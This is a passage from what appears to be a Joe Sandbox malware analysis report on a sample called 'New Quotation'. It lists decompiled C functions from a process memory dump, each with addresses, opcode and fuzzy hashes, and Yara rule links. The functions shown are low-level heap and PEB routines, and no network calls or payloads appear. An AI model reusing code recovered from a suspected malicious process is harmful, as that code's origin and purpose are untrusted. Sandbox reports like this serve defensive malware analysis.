				return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t17);
			}





                                                                                                                                                                                          0x1d7c8dcd
                                                                                                                                                                                          0x1d7c8dd0
                                                                                                                                                                                          0x1d7c8dd6
                                                                                                                                                                                          0x1d82b67e
                                                                                                                                                                                          0x1d82b680
                                                                                                                                                                                          0x1d82b683
                                                                                                                                                                                          0x1d82b683
                                                                                                                                                                                          0x1d7c8de0
                                                                                                                                                                                          0x1d82b68d
                                                                                                                                                                                          0x1d82b690
                                                                                                                                                                                          0x1d82b690
                                                                                                                                                                                          0x1d7c8dec
                                                                                                                                                                                          0x1d7c8df0
                                                                                                                                                                                          0x1d82b69d
                                                                                                                                                                                          0x1d82b69d
                                                                                                                                                                                          0x1d7c8e08

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                                                                                                          • Instruction ID: d2d8a8bcdd22e76e786b5eb28e1e3bb94a31452138eb8bc1ff351d39b7d2c3e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F08C34146A02EFC7325A18EC01B1377A0BF04B31F02865AB15A0A8B0CA24FC8ACB46
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D7C95 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7D7C95(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __ecx;
				_t20 = __ecx;
				if(E1D7E1BC4(__ecx, _t18) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1d7a10a8 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					if(_a4 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E1D8A4A6D(_t16, _t17, _t18, _t19, _t20);
					}
					return 0;
				} else {
					return 1;
				}
			}









                                                                                                                                                                                          0x1d7d7c95
                                                                                                                                                                                          0x1d7d7c9b
                                                                                                                                                                                          0x1d7d7ca4
                                                                                                                                                                                          0x1d831826
                                                                                                                                                                                          0x1d831837
                                                                                                                                                                                          0x1d831837
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d7cca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d7ccc

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5b5d100ed7584464e5a57138cb5dd0c8410dc248222485c2724a0d6632238fba
                                                                                                                                                                                          • Instruction ID: 3a6a0d5d38ea4a815ce635aaf34589f4b051db4164d7e8befca2d7fbddf34555
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5d100ed7584464e5a57138cb5dd0c8410dc248222485c2724a0d6632238fba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF0E5359142D8AFD752C72AD144F52B7E8EB08BB2F098662E80D87511C334E880C6DB
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8048F0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D8048F0(void* __ecx, intOrPtr* _a4) {
				void* _t6;
				signed int* _t11;
				intOrPtr* _t13;

				_t13 = _a4;
				if( *_t13 != 0) {
					return 0;
				}
				_t11 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x18);
				if(_t11 == 0) {
					_t6 = 0xc0000017;
				} else {
					E1D804993(_t11);
					 *_t13 = _t11;
					_t6 = 0;
				}
				return _t6;
			}






                                                                                                                                                                                          0x1d8048f6
                                                                                                                                                                                          0x1d8048fc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804928
                                                                                                                                                                                          0x1d804911
                                                                                                                                                                                          0x1d804915
                                                                                                                                                                                          0x1d80492c
                                                                                                                                                                                          0x1d804917
                                                                                                                                                                                          0x1d804919
                                                                                                                                                                                          0x1d80491e
                                                                                                                                                                                          0x1d804920
                                                                                                                                                                                          0x1d804920
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                          • Instruction ID: 9045928b8473514a36dba37a7a9b49358393f594f18e55046a339acec57a20f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0D836288149ABC3215E6DAD00B7AB7A5EBC4B62F124835F6848B260DA74EC40C3D2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D85D9C7 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E1D85D9C7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t6;
				void* _t19;

				_push(8);
				_push(0x1d8acec0);
				_t6 = E1D827BE4(__ebx, __edi, __esi);
				if( *0x1d8c6a0c == 0) {
					E1D7DFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
					if( *0x1d8c6a0c == 0) {
						 *0x1d8c6a10 = 0x1d8c6a0c;
						 *0x1d8c6a0c = 0x1d8c6a0c;
						 *0x1d8c6a08 = 0x1d8c6a04;
						 *0x1d8c6a04 = 0x1d8c6a04;
					}
					 *(_t19 - 4) = 0xfffffffe;
					_t6 = E1D85DA31();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0x10));
				return _t6;
			}





                                                                                                                                                                                          0x1d85d9c7
                                                                                                                                                                                          0x1d85d9c9
                                                                                                                                                                                          0x1d85d9ce
                                                                                                                                                                                          0x1d85d9da
                                                                                                                                                                                          0x1d85d9e5
                                                                                                                                                                                          0x1d85d9ea
                                                                                                                                                                                          0x1d85d9f5
                                                                                                                                                                                          0x1d85d9fc
                                                                                                                                                                                          0x1d85da01
                                                                                                                                                                                          0x1d85da0b
                                                                                                                                                                                          0x1d85da10
                                                                                                                                                                                          0x1d85da10
                                                                                                                                                                                          0x1d85da15
                                                                                                                                                                                          0x1d85da1c
                                                                                                                                                                                          0x1d85da1c
                                                                                                                                                                                          0x1d85da24
                                                                                                                                                                                          0x1d85da30

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 95144d5fb0b67a25dfc4e2c9dbc8260649ad0932311d43e0e8ab5eed7658e375
                                                                                                                                                                                          • Instruction ID: 85f44d89dc11b410fa28210efc96886e13630bdd306951c2259280814a926603
                                                                                                                                                                                          • Opcode Fuzzy Hash: 95144d5fb0b67a25dfc4e2c9dbc8260649ad0932311d43e0e8ab5eed7658e375
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F03A72949690DFDB41DF59E44279877B0F7083A9F10C03AD10797AA0DB366945CF02
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CD818 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E1D7CD818(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E1D804CF8( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = E1D7E5D90( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                                                                                          0x1d7cd81d
                                                                                                                                                                                          0x1d7cd821
                                                                                                                                                                                          0x1d7cd827
                                                                                                                                                                                          0x1d7cd832
                                                                                                                                                                                          0x1d7cd84c
                                                                                                                                                                                          0x1d7cd84c
                                                                                                                                                                                          0x1d7cd852

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0107590f2d2c136c9f5f799e53b390e07fd13c635fef93de83f9b9334d7b30b8
                                                                                                                                                                                          • Instruction ID: fd9ba076366bea26913997d43abd706ddede299cf286088bcfcf5a7e2cb90830
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0107590f2d2c136c9f5f799e53b390e07fd13c635fef93de83f9b9334d7b30b8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46E0DF32640128BFCB32969D8E09F9B7BECDF84BA0F064065BA00E70A0D570EE00D2A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80BD71 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D80BD71(void* __eax, intOrPtr* __ecx, void* __edx) {
				signed int _t14;

				_t14 = __ecx;
				if(__ecx != 0) {
					_t12 =  *__ecx;
					if( *__ecx != 0) {
						E1D7F332D(_t12);
					}
					if( *((intOrPtr*)(_t14 + 4)) != 0) {
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t14 + 4)));
					}
					return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
				} else {
					return __eax;
				}
			}




                                                                                                                                                                                          0x1d80bd74
                                                                                                                                                                                          0x1d80bd78
                                                                                                                                                                                          0x1d80bd7c
                                                                                                                                                                                          0x1d80bd80
                                                                                                                                                                                          0x1d80bd82
                                                                                                                                                                                          0x1d80bd82
                                                                                                                                                                                          0x1d80bd8b
                                                                                                                                                                                          0x1d84792a
                                                                                                                                                                                          0x1d84792a
                                                                                                                                                                                          0x1d80bda3
                                                                                                                                                                                          0x1d80bd7b
                                                                                                                                                                                          0x1d80bd7b
                                                                                                                                                                                          0x1d80bd7b

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f148ede0e5463eb6edfe922dc4616cc1137ebdaa4300e21df3ff2bea6fa7f542
                                                                                                                                                                                          • Instruction ID: 700e79d2c5936f16a63093e991114607c7f581f0f995a61b9839ccbfa8ea821e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f148ede0e5463eb6edfe922dc4616cc1137ebdaa4300e21df3ff2bea6fa7f542
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E06832542950DBCB329F08EC10FA277A0EF00F20F060058F949079B08730FC80C6C2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CBE18 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c0b50cc4f642d787da9f188e419348923fb3544b58f3fc9c3dd2eae02e739003
                                                                                                                                                                                          • Instruction ID: b72beda337f7970f6493a7896b55fcae3a27bc7e4711e8462713f2ab34f55ada
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b50cc4f642d787da9f188e419348923fb3544b58f3fc9c3dd2eae02e739003
                                                                                                                                                                                          • Instruction Fuzzy Hash: 97E0C236200800BFEB130AA6DC80E62FB6EFB842B1B210035F62482530CB22EC71F790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FD9CE Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7FD9CE() {
				intOrPtr _t13;
				void* _t18;
				intOrPtr _t20;
				intOrPtr _t23;

				_t13 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)(_t13 + 0x18));
				if( *((intOrPtr*)(_t23 + 8)) == 0xddeeddee) {
					return E1D899335(_t23, 1, _t18);
				} else {
					if(( *(_t23 + 0x44) & 0x01000000) == 0) {
						_t20 =  *((intOrPtr*)(_t23 + 0xc8));
						 *(_t20 + 0x10) =  *(_t20 + 0x10) & 0x00000000;
						 *((intOrPtr*)(_t20 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						 *((intOrPtr*)(_t20 + 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t20 + 8)) = 1;
						return E1D7FDA20(_t20, _t23);
					}
					return _t13;
				}
			}







                                                                                                                                                                                          0x1d7fd9ce
                                                                                                                                                                                          0x1d7fd9d5
                                                                                                                                                                                          0x1d7fd9df
                                                                                                                                                                                          0x1d83f402
                                                                                                                                                                                          0x1d7fd9e5
                                                                                                                                                                                          0x1d7fd9ec
                                                                                                                                                                                          0x1d7fd9f4
                                                                                                                                                                                          0x1d7fd9fe
                                                                                                                                                                                          0x1d7fda02
                                                                                                                                                                                          0x1d7fda05
                                                                                                                                                                                          0x1d7fda0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fda13
                                                                                                                                                                                          0x1d7fda19
                                                                                                                                                                                          0x1d7fda19

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 129b7c41e91761c3dd6a98ce814cf31cfbe377d78e8ac8b133d377f3e34eb926
                                                                                                                                                                                          • Instruction ID: dcc84c5ba63eae99af7d88f47fa6b5ea890dee83f6d4bd5d8ab1d7acd68e1c56
                                                                                                                                                                                          • Opcode Fuzzy Hash: 129b7c41e91761c3dd6a98ce814cf31cfbe377d78e8ac8b133d377f3e34eb926
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21F08C32510B508FD328CF18D100BA273A4EB84725F15858CE06E8B6A1C776EC83CB85
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D853C80 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D853C80(intOrPtr* _a4, intOrPtr* _a8, signed int* _a12) {
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed int* _t13;

				_t11 = _a4;
				_t10 =  *[fs:0x30];
				if(_t11 != 0) {
					_t7 =  *((intOrPtr*)(_t10 + 0xa4));
					 *_t11 = _t7;
				}
				_t12 = _a8;
				if(_t12 != 0) {
					_t7 =  *((intOrPtr*)(_t10 + 0xa8));
					 *_t12 = _t7;
				}
				_t13 = _a12;
				if(_t13 != 0) {
					_t9 =  *(_t10 + 0xac) & 0x0000ffff | 0xf0000000;
					 *_t13 = _t9;
					return _t9;
				}
				return _t7;
			}









                                                                                                                                                                                          0x1d853c85
                                                                                                                                                                                          0x1d853c88
                                                                                                                                                                                          0x1d853c91
                                                                                                                                                                                          0x1d853c93
                                                                                                                                                                                          0x1d853c99
                                                                                                                                                                                          0x1d853c99
                                                                                                                                                                                          0x1d853c9b
                                                                                                                                                                                          0x1d853ca0
                                                                                                                                                                                          0x1d853ca2
                                                                                                                                                                                          0x1d853ca8
                                                                                                                                                                                          0x1d853ca8
                                                                                                                                                                                          0x1d853caa
                                                                                                                                                                                          0x1d853caf
                                                                                                                                                                                          0x1d853cb8
                                                                                                                                                                                          0x1d853cbd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853cbd
                                                                                                                                                                                          0x1d853cc0

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                          • Instruction ID: 1c25b24fb49958b6caa604a11f9502ce4901fbf7bcd4f4976f25e78006f8c751
                                                                                                                                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE0C279300305AFD705CF19C054B6277A6BFD5A10F26C068E8488F309E732E842CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CFE40 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CFE40(void* __ecx, signed char _a4) {
				signed int _t12;

				if(( *(__ecx + 0x40) & 0x75010f63) != 2 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					return 0;
				} else {
					if((_a4 & 0x00000001) != 0) {
						_t12 = 1;
					} else {
						_t12 =  *0x1d8c4360; // 0x10
					}
					return 0x7d0 + _t12 * 0x3480;
				}
			}




                                                                                                                                                                                          0x1d7cfe50
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cfe61
                                                                                                                                                                                          0x1d7cfe65
                                                                                                                                                                                          0x1d7cfe7d
                                                                                                                                                                                          0x1d7cfe67
                                                                                                                                                                                          0x1d7cfe67
                                                                                                                                                                                          0x1d7cfe67
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cfe72

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f32b3b0b2a3185c9f77b30e271f507c8231cdefae4741c6b725ae1d10ace1314
                                                                                                                                                                                          • Instruction ID: 55d357f92ecd7d263ed712a63a0188ebff1c2c929fbecbe95e27edc78b1b9d6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32b3b0b2a3185c9f77b30e271f507c8231cdefae4741c6b725ae1d10ace1314
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE0DF3361128B9FC312A618C482B12B7A8F794BA8F20842AE504CA482D328E441C682
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80BED0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                          			E1D80BED0(intOrPtr _a4, char _a8) {
				void* __ebp;
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_t13 = _a4;
				if(_t13 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E1D8A4A6D(_t12, _t13, _t14, _t15, _t16);
				} else {
					_push("true");
					_push( &_a8);
					_push(0xe);
					_push( *((intOrPtr*)(_t13 + 0x24)));
					return E1D8143A0();
				}
			}









                                                                                                                                                                                          0x1d80bed5
                                                                                                                                                                                          0x1d80beda
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80bef1
                                                                                                                                                                                          0x1d80bef1
                                                                                                                                                                                          0x1d80bef6
                                                                                                                                                                                          0x1d80bef7
                                                                                                                                                                                          0x1d80bef9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80befc

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0385992f1b44e07c5f6db36d8b716865511d134a8f8ffa353fe5f318e982f28b
                                                                                                                                                                                          • Instruction ID: ecff3f11de2aa03089cdf821da22dda6843b25dfa0bb257b7e642c387ad4b8f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0385992f1b44e07c5f6db36d8b716865511d134a8f8ffa353fe5f318e982f28b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1E01A75154248AAEB019F08C884F6577A9EB98B24F128055B6198B571C7B4F984CF46
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80C958 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2ab13a867b54e85ec81ba9f45a85b5728daff122fdd4a95b026238636b4fcf28
                                                                                                                                                                                          • Instruction ID: c1baebb80578eb72a59fc9ec7ce5ca2b1ed54d146db6b69e644bdcb8fca2e59c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab13a867b54e85ec81ba9f45a85b5728daff122fdd4a95b026238636b4fcf28
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58D02B3215A2B06AC722AA297C08FE73A5CAB45670F020570F11CE2124E514DC42C1C1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C8C3D Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E1D7C8C3D(signed int __ecx) {
				signed int _t11;

				_t11 = __ecx;
